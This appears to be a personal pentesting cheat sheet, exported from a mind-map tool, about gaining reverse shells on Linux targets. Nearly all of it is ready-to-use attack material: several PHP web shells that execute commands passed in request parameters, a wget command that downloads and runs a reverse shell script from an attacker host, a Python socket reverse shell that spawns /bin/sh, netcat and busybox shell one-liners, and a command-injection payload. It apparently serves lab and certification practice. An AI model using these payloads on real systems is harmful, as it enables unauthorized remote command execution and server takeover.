x

Reverse Shell Techniques

Linux rce techniques

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php

python3 -m http.server

nc -nlvp 443

<?php system("wget http://<kali IP>/shell.php -O /tmp/shell.php;php /tmp/shell.php");?>

echo '<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>' > shell.php
shell.php&cmd=
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your $IP",22));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
nc -nlvp 22

or 

busybox nc $IP 5000 -e /bin/bash

 &cmd=whoami or ?cmd=whoami
<?php shell_exec($_GET["cmd"]);?>
<?php system($_GET["cmd"]);?>
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

cp /usr/share/webshells/php/php-reverse-shell.php .

python3 -m http.server 800

nc -nlvp 443
&cmd=wget http://192.168.119.168:800/php-reverse-shell.php -O /tmp/shell.php;php /tmp/shell.php

Netcat Revshell

Sometimes an environment will make running extended commands from bash, busybox, etc impossible. This is where netcat can become useful. Example is from a Command Injection exploit.
https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-noname-da8a0e72cb5 

||netcat+192.168.45.159+2030|`which+bash`

nc -nvlp 2030 < shell.sh

Reverse Shell Payload

https://revshells.com/

https://github.com/mthbernardes/rsg

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Left-click: follow link, Right-click: select node, Scroll: zoom
x